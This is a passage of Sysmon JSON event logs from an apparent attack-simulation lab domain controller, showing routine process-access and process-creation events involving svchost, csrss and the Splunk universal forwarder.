C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:33.532","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3447,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:33.532\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:33.532","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3448,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:33.532\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:33.532","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3449,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:33.548\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1FF5-5F25-0000-00106D760500}\r\nTargetProcessId: 3064\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:33.548","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1FF5-5F25-0000-00106D760500}","TargetProcessId":"3064","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3450,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:33.551\r\nProcessGuid: {41C8662E-1FF5-5F25-0000-00101F770500}\r\nProcessId: 2968\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nFileVersion: 8.0.2\r\nDescription: splunkd service\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunkd.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool validate-strptime --log-warnings\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589\r\nParentProcessGuid: {41C8662E-1FF5-5F25-0000-00106D760500}\r\nParentProcessId: 3064\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool\" validate-strptime --log-warnings","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:55:33.551","ProcessGuid":"{41C8662E-1FF5-5F25-0000-00101F770500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","FileVersion":"8.0.2","Description":"splunkd service","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunkd.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool validate-strptime --log-warnings","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589","ParentProcessGuid":"{41C8662E-1FF5-5F25-0000-00106D760500}","ParentProcessId":"3064","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool\" validate-strptime --log-warnings","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3451,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:33.548\r\nSourceProcessGUID: {41C8662E-1FF5-5F25-0000-00106D760500}\r\nSourceProcessId: 3064\r\nSourceThreadId: 3068\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nTargetProcessGUID: {41C8662E-1FF5-5F25-0000-00101F770500}\r\nTargetProcessId: 2968\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:33.548","SourceProcessGUID":"{41C8662E-1FF5-5F25-0000-00106D760500}","SourceProcessId":"3064","SourceThreadId":"3068","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","TargetProcessGUID":"{41C8662E-1FF5-5F25-0000-00101F770500}","TargetProcessId":"2968","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3452,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:33.548\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1FF5-5F25-0000-00101F770500}\r\nTargetProcessId: 2968\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:33.548","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1FF5-5F25-0000-00101F770500}","TargetProcessId":"2968","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3453,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:33.548\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:33.548","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3454,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:33.548\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:33.548","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3455,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:33.548\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 